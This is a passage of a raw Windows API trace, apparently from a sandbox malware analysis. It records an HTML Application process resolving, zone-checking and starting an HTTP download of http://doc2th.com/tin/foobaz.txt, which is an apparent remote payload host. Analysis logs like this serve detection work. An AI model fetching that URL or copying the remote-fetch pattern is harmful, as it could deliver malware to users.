phkResult=0x40f57c*=0x88) returned 0x0 [0026.659] SHGetValueW (in: hkey=0x88, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x40f580, pcbData=0x40f578*=0xa | out: pdwType=0x0, pvData=0x40f580, pcbData=0x40f578*=0xa) returned 0x2 [0026.659] RegCloseKey (hKey=0x88) returned 0x0 [0026.670] GetAcceptLanguagesW () returned 0x0 [0026.670] GetClassNameW (in: hWnd=0x10200, lpClassName=0x40f84c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0026.670] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0026.670] GetParent (hWnd=0x10200) returned 0x101fc [0026.670] GetClassNameW (in: hWnd=0x101fc, lpClassName=0x40f84c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0026.670] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0026.670] GetParent (hWnd=0x101fc) returned 0x0 [0026.672] IMoniker:GetDisplayName (in: This=0xff600, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x40f810 | out: 
ppszDisplayName=0x40f810*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0026.672] IUnknown:QueryInterface (in: This=0xff600, riid=0x632872f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x40f7e8 | out: ppvObject=0x40f7e8*=0xff60c) returned 0x0 [0026.672] IUriContainer:GetIUri (in: This=0xff60c, ppIUri=0x40f818 | out: ppIUri=0x40f818*=0x11ae64) returned 0x0 [0026.672] IUnknown:Release (This=0xff60c) returned 0x1 [0026.672] IUnknown:AddRef (This=0xff600) returned 0x2 [0026.672] IUnknown:AddRef (This=0x11ae64) returned 0x5 [0026.672] IMoniker:GetDisplayName (in: This=0xff600, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x40f6f0 | out: ppszDisplayName=0x40f6f0*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0026.672] UrlGetLocationW (psz1="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0026.672] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://doc2th.com/tin/foobaz.txt", ppmk=0x40f6bc*=0x0, dwFlags=0x1 | out: ppmk=0x40f6bc*=0x12e480) returned 0x0 [0026.673] CreateUri (in: pwzURI="http://doc2th.com/tin/foobaz.txt", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x40f6b4 | out: ppURI=0x40f6b4*=0x11ae64) returned 0x0 [0026.673] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f64c | out: pdwScheme=0x40f64c*=0x2) returned 0x0 [0026.673] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0026.673] IUnknown:AddRef (This=0x11ae64) returned 0x9 [0026.673] IUri:GetAbsoluteUri (in: This=0x11ae64, pbstrAbsoluteUri=0x120bd0 | out: pbstrAbsoluteUri=0x120bd0*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0026.673] IUnknown:Release (This=0x11ae64) returned 0x8 [0026.673] IUnknown:AddRef (This=0x12e480) returned 0x2 [0026.673] IUnknown:Release (This=0x12e480) returned 0x1 [0026.673] IUnknown:AddRef (This=0xff600) returned 0x3 [0026.673] IUnknown:Release (This=0x12e480) returned 0x0 [0026.673] IUnknown:AddRef (This=0xff600) returned 0x4 [0026.673] 
IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f4bc | out: ppvObject=0x40f4bc*=0x11ae64) returned 0x0 [0026.673] IUnknown:Release (This=0x11ae64) returned 0x6 [0026.673] IUnknown:AddRef (This=0x11ae64) returned 0x7 [0026.673] IUnknown:QueryInterface (in: This=0xff600, riid=0x632872f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x40f490 | out: ppvObject=0x40f490*=0xff60c) returned 0x0 [0026.673] IUriContainer:GetIUri (in: This=0xff60c, ppIUri=0x40f4e4 | out: ppIUri=0x40f4e4*=0x11ae64) returned 0x0 [0026.673] IUnknown:Release (This=0xff60c) returned 0x4 [0026.673] IUnknown:AddRef (This=0xff600) returned 0x5 [0026.673] IUnknown:Release (This=0xff600) returned 0x4 [0026.673] IUnknown:AddRef (This=0x11ae64) returned 0x9 [0026.673] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f4bc | out: ppvObject=0x40f4bc*=0x11ae64) returned 0x0 [0026.673] IUnknown:Release (This=0x11ae64) returned 0x9 [0026.673] IUnknown:AddRef (This=0x11ae64) returned 0xa [0026.673] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f4b4 | out: pdwScheme=0x40f4b4*=0x2) returned 0x0 [0026.673] GetCurrentProcessId () returned 0xa18 [0026.673] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f4bc | out: ppvObject=0x40f4bc*=0x11ae64) returned 0x0 [0026.674] IUnknown:Release (This=0x11ae64) returned 0xa [0026.674] IUnknown:AddRef (This=0x11ae64) returned 0xb [0026.674] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f48c | out: 
pdwScheme=0x40f48c*=0x2) returned 0x0 [0026.674] IUri:GetAbsoluteUri (in: This=0x11ae64, pbstrAbsoluteUri=0x40f4bc | out: pbstrAbsoluteUri=0x40f4bc*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0026.674] GetProcAddress (hModule=0x75580000, lpProcName=0x7) returned 0x75584680 [0026.674] SysStringLen (param_1="http://doc2th.com/tin/foobaz.txt") returned 0x20 [0026.674] CreateUri (in: pwzURI="http://doc2th.com/tin/foobaz.txt", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x40f4d8 | out: ppURI=0x40f4d8*=0x11ae64) returned 0x0 [0026.674] IUnknown:Release (This=0x11ae64) returned 0xb [0026.674] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f46c | out: pdwScheme=0x40f46c*=0x2) returned 0x0 [0026.674] IUnknown:AddRef (This=0x11ae64) returned 0xc [0026.674] IUri:GetPropertyDWORD (in: This=0x11ae64, uriProp=0x11, pdwProperty=0x40f24c, dwFlags=0x0 | out: pdwProperty=0x40f24c*=0x2) returned 0x0 [0026.674] IInternetSecurityManager:GetSecurityId (in: This=0x122f88, pwszUrl="http://doc2th.com/tin/foobaz.txt", pbSecurityId=0x40f2b0, pcbSecurityId=0x40f2ac*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40f2b0*=0x68, pcbSecurityId=0x40f2ac*=0x13) returned 0x0 [0026.674] IInternetSecurityManager:GetSecurityId (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pbSecurityId=0x40f2b0, pcbSecurityId=0x40f2ac*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40f2b0*=0x0, pcbSecurityId=0x40f2ac*=0x200) returned 0x800c0011 [0027.306] IUnknown:Release (This=0x11ae64) returned 0xb [0027.306] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f468 | out: ppu=0x40f468) returned 0x0 [0027.306] GetDC (hWnd=0x0) returned 0xb0108b5 [0027.307] CreateCompatibleBitmap (hdc=0xb0108b5, cx=1, cy=1) returned 0x230507a4 [0027.307] GetDIBits (in: hdc=0xb0108b5, hbm=0x230507a4, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x40f038, usage=0x0 | out: lpvBits=0x0, lpbmi=0x40f038) returned 1 [0027.307] GetDIBits (in: hdc=0xb0108b5, hbm=0x230507a4, start=0x0, cLines=0x1, lpvBits=0x0, 
lpbmi=0x40f038, usage=0x0 | out: lpvBits=0x0, lpbmi=0x40f038) returned 1 [0027.307] DeleteObject (ho=0x230507a4) returned 1 [0027.307] GetSysColor (nIndex=0) returned 0xc8c8c8 [0027.307] GetSysColor (nIndex=1) returned 0x0 [0027.307] GetSysColor (nIndex=2) returned 0xd1b499 [0027.307] GetSysColor (nIndex=3) returned 0xdbcdbf [0027.307] GetSysColor (nIndex=4) returned 0xf0f0f0 [0027.307] GetSysColor (nIndex=5) returned 0xffffff [0027.307] GetSysColor (nIndex=6) returned 0x646464 [0027.307] GetSysColor (nIndex=7) returned 0x0 [0027.307] GetSysColor (nIndex=8) returned 0x0 [0027.307] GetSysColor (nIndex=9) returned 0x0 [0027.307] GetSysColor (nIndex=10) returned 0xb4b4b4 [0027.307] GetSysColor (nIndex=11) returned 0xfcf7f4 [0027.307] GetSysColor (nIndex=12) returned 0xababab [0027.307] GetSysColor (nIndex=13) returned 0xff9933 [0027.307] GetSysColor (nIndex=14) returned 0xffffff [0027.307] GetSysColor (nIndex=15) returned 0xf0f0f0 [0027.307] GetSysColor (nIndex=16) returned 0xa0a0a0 [0027.307] GetSysColor (nIndex=17) returned 0x6d6d6d [0027.307] GetSysColor (nIndex=18) returned 0x0 [0027.307] GetSysColor (nIndex=19) returned 0x544e43 [0027.307] GetSysColor (nIndex=20) returned 0xffffff [0027.307] GetSysColor (nIndex=21) returned 0x696969 [0027.307] GetSysColor (nIndex=22) returned 0xe3e3e3 [0027.307] GetSysColor (nIndex=23) returned 0x0 [0027.307] GetSysColor (nIndex=24) returned 0xe1ffff [0027.307] GetSysColor (nIndex=25) returned 0x0 [0027.307] GetSysColor (nIndex=26) returned 0xcc6600 [0027.307] GetSysColor (nIndex=27) returned 0xead1b9 [0027.307] GetSysColor (nIndex=28) returned 0xf2e4d7 [0027.307] GetSysColor (nIndex=29) returned 0xff9933 [0027.307] GetSysColor (nIndex=30) returned 0xf0f0f0 [0027.307] GetSysColor (nIndex=31) returned 0x0 [0027.307] GetSysColor (nIndex=32) returned 0x0 [0027.307] GetSysColor (nIndex=33) returned 0x0 [0027.307] GetSysColor (nIndex=34) returned 0x0 [0027.307] GetSysColor (nIndex=35) returned 0x0 [0027.307] GetSysColor (nIndex=36) 
returned 0x0 [0027.307] GetSysColor (nIndex=37) returned 0x0 [0027.307] GetSysColor (nIndex=38) returned 0x0 [0027.307] GetSysColor (nIndex=39) returned 0x0 [0027.307] GetSysColor (nIndex=40) returned 0x0 [0027.307] GetSysColor (nIndex=41) returned 0x0 [0027.307] GetSysColor (nIndex=42) returned 0x0 [0027.307] GetSysColor (nIndex=43) returned 0x0 [0027.307] GetSysColor (nIndex=44) returned 0x0 [0027.307] GetSysColor (nIndex=45) returned 0x0 [0027.307] GetSysColor (nIndex=46) returned 0x0 [0027.307] GetSysColor (nIndex=47) returned 0x0 [0027.307] GetSysColor (nIndex=48) returned 0x0 [0027.307] GetSysColor (nIndex=49) returned 0x0 [0027.308] GetSysColor (nIndex=50) returned 0x0 [0027.308] GetSysColor (nIndex=51) returned 0x0 [0027.308] GetSysColor (nIndex=52) returned 0x0 [0027.308] GetSysColor (nIndex=53) returned 0x0 [0027.308] GetSysColor (nIndex=54) returned 0x0 [0027.308] GetSysColor (nIndex=55) returned 0x0 [0027.308] GetSysColor (nIndex=56) returned 0x0 [0027.308] GetSysColor (nIndex=57) returned 0x0 [0027.308] GetSysColor (nIndex=58) returned 0x0 [0027.308] GetSysColor (nIndex=59) returned 0x0 [0027.308] GetSysColor (nIndex=60) returned 0x0 [0027.308] GetSysColor (nIndex=61) returned 0x0 [0027.308] GetSysColor (nIndex=62) returned 0x0 [0027.308] GetSysColor (nIndex=63) returned 0x0 [0027.308] GetDeviceCaps (hdc=0xb0108b5, index=38) returned 32409 [0027.308] ReleaseDC (hWnd=0x0, hDC=0xb0108b5) returned 1 [0027.308] GetCurrentThreadId () returned 0xa1c [0027.308] GetCursorPos (in: lpPoint=0x40f2b8 | out: lpPoint=0x40f2b8*(x=1248, y=501)) returned 1 [0027.308] GetKeyState (nVirtKey=16) returned 0 [0027.308] GetKeyState (nVirtKey=17) returned 0 [0027.308] GetKeyState (nVirtKey=18) returned 0 [0027.308] GetKeyState (nVirtKey=160) returned 0 [0027.308] GetKeyState (nVirtKey=162) returned 0 [0027.308] GetKeyState (nVirtKey=164) returned 0 [0027.309] GetProcAddress (hModule=0x75580000, lpProcName=0x8) returned 0x75583ed5 [0027.309] GetCurrentThreadId () returned 
0xa1c [0027.309] ParseURLW (in: pcszURL="http://doc2th.com/tin/foobaz.txt", ppu=0x40f458 | out: ppu=0x40f458) returned 0x0 [0027.309] CreateUri (in: pwzURI="http://doc2th.com/tin/foobaz.txt", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x40f43c | out: ppURI=0x40f43c*=0x11ae64) returned 0x0 [0027.309] IUnknown:AddRef (This=0x11ae64) returned 0xd [0027.309] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f3dc, dwFlags=0x0 | out: pdwZone=0x40f3dc*=0xffffffff) returned 0x800c0011 [0027.309] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0027.309] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0027.309] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0027.309] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x2700, pPolicy=0x40f3e0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x40f3e0*=0x0) returned 0x0 [0027.309] IUnknown:Release (This=0x11ae64) returned 0xc [0027.309] IUnknown:Release (This=0x11ae64) returned 0xb [0027.309] IUnknown:AddRef (This=0x11ae64) returned 0xc [0027.309] IUri:GetPropertyDWORD (in: This=0x11ae64, uriProp=0x11, pdwProperty=0x40f214, dwFlags=0x0 | out: pdwProperty=0x40f214*=0x2) returned 0x0 [0027.309] IInternetSecurityManager:GetSecurityId (in: This=0x122f88, pwszUrl="http://doc2th.com/tin/foobaz.txt", pbSecurityId=0x40f270, pcbSecurityId=0x40f26c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40f270*=0x68, pcbSecurityId=0x40f26c*=0x13) returned 0x0 [0027.309] IInternetSecurityManager:GetSecurityId (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pbSecurityId=0x40f270, pcbSecurityId=0x40f26c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40f270*=0x0, pcbSecurityId=0x40f26c*=0x200) returned 0x800c0011 [0027.309] IUnknown:Release (This=0x11ae64) returned 0xb [0027.309] 
CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x40f494, dwReserved=0x0 | out: ppIInternetSession=0x40f494*=0x124868) returned 0x0 [0027.309] IInternetSession:RegisterNameSpace (This=0x124868, pCF=0x63688c50, rclsid=0x63289790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0027.310] IUnknown:AddRef (This=0x63688c50) returned 0x1 [0027.310] IInternetSession:RegisterNameSpace (This=0x124868, pCF=0x63688c70, rclsid=0x63289780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0027.310] IUnknown:AddRef (This=0x63688c70) returned 0x1 [0027.310] StrCmpICW (pszStr1="http://doc2th.com/tin/foobaz.txt", pszStr2="res://ieframe.dll/PhishSite.htm") returned -10 [0027.310] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f404 | out: ppvObject=0x40f404*=0x11ae64) returned 0x0 [0027.310] IUnknown:Release (This=0x11ae64) returned 0xb [0027.310] IUnknown:AddRef (This=0x11ae64) returned 0xc [0027.310] IUnknown:AddRef (This=0x11ae64) returned 0xd [0027.310] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f3c8 | out: ppvObject=0x40f3c8*=0x11ae64) returned 0x0 [0027.311] IUnknown:Release (This=0x11ae64) returned 0xd [0027.311] IUnknown:AddRef (This=0x11ae64) returned 0xe [0027.311] IUnknown:Release (This=0x11ae64) returned 0xd [0027.311] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f44c | out: pdwScheme=0x40f44c*=0x2) returned 0x0 [0027.311] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0027.311] IUnknown:AddRef (This=0x11ae64) returned 0xe [0027.311] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, 
Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f3e8 | out: ppvObject=0x40f3e8*=0x11ae64) returned 0x0 [0027.311] IUnknown:Release (This=0x11ae64) returned 0xe [0027.311] IUnknown:AddRef (This=0x11ae64) returned 0xf [0027.311] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f0ec | out: ppvObject=0x40f0ec*=0x11ae64) returned 0x0 [0027.312] IUnknown:Release (This=0x11ae64) returned 0xf [0027.312] IUnknown:AddRef (This=0x11ae64) returned 0x10 [0027.312] IUnknown:AddRef (This=0x11ae64) returned 0x11 [0027.312] IUnknown:AddRef (This=0x11ae64) returned 0x12 [0027.312] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f0e0 | out: ppvObject=0x40f0e0*=0x11ae64) returned 0x0 [0027.312] IUnknown:Release (This=0x11ae64) returned 0x12 [0027.312] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0027.312] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x14b338 | out: pdwScheme=0x14b338*=0x2) returned 0x0 [0027.312] IMoniker:IsSystemMoniker (in: This=0xff600, pdwMksys=0x40f148 | out: pdwMksys=0x40f148*=0x6) returned 0x0 [0027.312] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f0ec | out: ppvObject=0x40f0ec*=0x11ae64) returned 0x0 [0027.312] IUnknown:Release (This=0x11ae64) returned 0x13 [0027.312] IUnknown:AddRef (This=0x11ae64) returned 0x14 [0027.313] IInternetSession:CreateBinding (in: This=0x124868, pbc=0x0, szUrl="http://doc2th.com/tin/foobaz.txt", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x141488, dwOption=0x0 | out: ppunk=0x0, 
ppOInetProt=0x141488*=0x14b3e8) returned 0x0 [0027.313] IUnknown:QueryInterface (in: This=0x14b3e8, riid=0x632a6078*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x40f070 | out: ppvObject=0x40f070*=0x0) returned 0x80004002 [0027.313] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f00c | out: phkResult=0x40f00c*=0x370) returned 0x0 [0027.313] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f010 | out: phkResult=0x40f010*=0x36c) returned 0x0 [0027.313] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x40efcc | out: phkResult=0x40efcc*=0x0) returned 0x2 [0027.313] RegOpenKeyExW (in: hKey=0x370, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x40efcc | out: phkResult=0x40efcc*=0x374) returned 0x0 [0027.313] SHRegGetValueW () returned 0x2 [0027.314] SHRegGetValueW () returned 0x2 [0027.314] RegCloseKey (hKey=0x374) returned 0x0 [0027.314] RegCloseKey (hKey=0x0) returned 0x6 [0027.314] RegCloseKey (hKey=0x0) returned 0x6 [0027.314] RegCloseKey (hKey=0x370) returned 0x0 [0027.314] RegCloseKey (hKey=0x36c) returned 0x0 [0027.314] IUnknown:AddRef (This=0x14b3e8) returned 0x2 [0027.314] IUnknown:QueryInterface (in: This=0x14b3e8, riid=0x632a6158*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x40f0b4 | out: ppvObject=0x40f0b4*=0x14b3e8) returned 0x0 [0027.314] IInternetProtocolEx:StartEx (This=0x14b3e8, pUri=0x11ae64, pOIProtSink=0x14b284, pOIBindInfo=0x14b24c, grfPI=0x10, dwReserved=0x0) returned 0x0 [0027.314] IUnknown:AddRef (This=0x14b284) returned 0x3 [0027.314] IUnknown:AddRef 
(This=0x14b24c) returned 0x4 [0027.314] IUnknown:QueryInterface (in: This=0x14b24c, riid=0x764a6f40*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x40f05c | out: ppvObject=0x40f05c*=0x0) returned 0x80004002 [0027.314] IInternetBindInfo:GetBindInfo (in: This=0x14b24c, grfBINDF=0x14b558, pbindinfo=0x14b560 | out: grfBINDF=0x14b558*=0x20083, pbindinfo=0x14b560) returned 0x0 [0027.314] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40efb8 | out: phkResult=0x40efb8*=0x36c) returned 0x0 [0027.314] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40efbc | out: phkResult=0x40efbc*=0x370) returned 0x0 [0027.314] RegOpenKeyExW (in: hKey=0x370, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x40ef78 | out: phkResult=0x40ef78*=0x0) returned 0x2 [0027.314] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x40ef78 | out: phkResult=0x40ef78*=0x0) returned 0x2 [0027.314] RegCloseKey (hKey=0x0) returned 0x6 [0027.314] RegCloseKey (hKey=0x0) returned 0x6 [0027.314] RegCloseKey (hKey=0x36c) returned 0x0 [0027.314] RegCloseKey (hKey=0x370) returned 0x0 [0027.314] IUnknown:AddRef (This=0x14b284) returned 0x5 [0027.375] IInternetBindInfo:GetBindString (in: This=0x14b24c, ulStringType=0x2, ppwzStr=0x40e810, cEl=0x100, pcElFetched=0x40f018*=0x100 | out: ppwzStr=0x40e810*="*/*", pcElFetched=0x40f018*=0x1) returned 0x0 [0027.375] CoTaskMemAlloc (cb=0x8) returned 0x13ffe0 [0027.375] IUnknown:QueryInterface (in: This=0x14b284, riid=0x764b97c8*(Data1=0x58dfc7d0, Data2=0x5381, Data3=0x43e5, Data4=([0]=0x9d, [1]=0x72, [2]=0x4c, [3]=0xdd, [4]=0xe4, [5]=0xcb, 
[6]=0xf, [7]=0x1a)), ppvObject=0x40f018 | out: ppvObject=0x40f018*=0x0) returned 0x80004002 [0027.376] IUnknown:QueryInterface (in: This=0x14b284, riid=0x764a61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x14b4b0 | out: ppvObject=0x14b4b0*=0x14b244) returned 0x0 [0027.376] IServiceProvider:QueryService (in: This=0x14b244, guidService=0x764a6b20*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x764a6b20*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14b644 | out: ppvObject=0x14b644*=0x14b248) returned 0x0 [0027.376] IHttpNegotiate:BeginningTransaction (in: This=0x14b248, szUrl="http://doc2th.com/tin/foobaz.txt", szHeaders="Accept-Encoding: gzip, deflate", dwReserved=0x0, pszAdditionalHeaders=0x40e7cc | out: pszAdditionalHeaders=0x40e7cc*="Accept-Language: en-US\r\n") returned 0x0 [0027.376] CreateUri (in: pwzURI="http://doc2th.com/tin/foobaz.txt", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x40e790 | out: ppURI=0x40e790*=0x11ae64) returned 0x0 [0027.376] IUnknown:AddRef (This=0x11ae64) returned 0x19 [0027.376] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40e6e8 | out: ppvObject=0x40e6e8*=0x11ae64) returned 0x0 [0027.376] IUnknown:Release (This=0x11ae64) returned 0x19 [0027.376] IUnknown:AddRef (This=0x11ae64) returned 0x1a [0027.377] CoTaskMemAlloc (cb=0x32) returned 0x12e880 [0027.377] IUnknown:Release (This=0x11ae64) returned 0x19 [0027.377] IServiceProvider:QueryService (in: This=0x14b244, guidService=0x764a6b30*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, 
[6]=0x5c, [7]=0xb4)), riid=0x764a6b30*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x14b668 | out: ppvObject=0x14b668*=0x14b248) returned 0x0 [0027.377] IHttpNegotiate2:GetRootSecurityId (in: This=0x14b248, pbSecurityId=0x40e5cc, pcbSecurityId=0x14b634*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40e5cc*=0xe7, pcbSecurityId=0x14b634*=0x200) returned 0x80004005 [0027.377] IUnknown:Release (This=0x14b3e8) returned 0x4 [0027.377] IUnknown:Release (This=0x11ae64) returned 0x17 [0027.377] IUnknown:Release (This=0x11ae64) returned 0x16 [0027.377] IUnknown:Release (This=0x11ae64) returned 0x15 [0027.377] CoTaskMemFree (pv=0x0) [0027.377] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x40f3a0 | out: lpCPInfo=0x40f3a0) returned 1 [0027.377] IUnknown:AddRef (This=0x124868) returned 0x3 [0027.378] IUnknown:AddRef (This=0x11ae64) returned 0x16 [0027.378] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f3a8 | out: ppvObject=0x40f3a8*=0x11ae64) returned 0x0 [0027.378] IUnknown:Release (This=0x11ae64) returned 0x16 [0027.378] IUnknown:AddRef (This=0x11ae64) returned 0x17 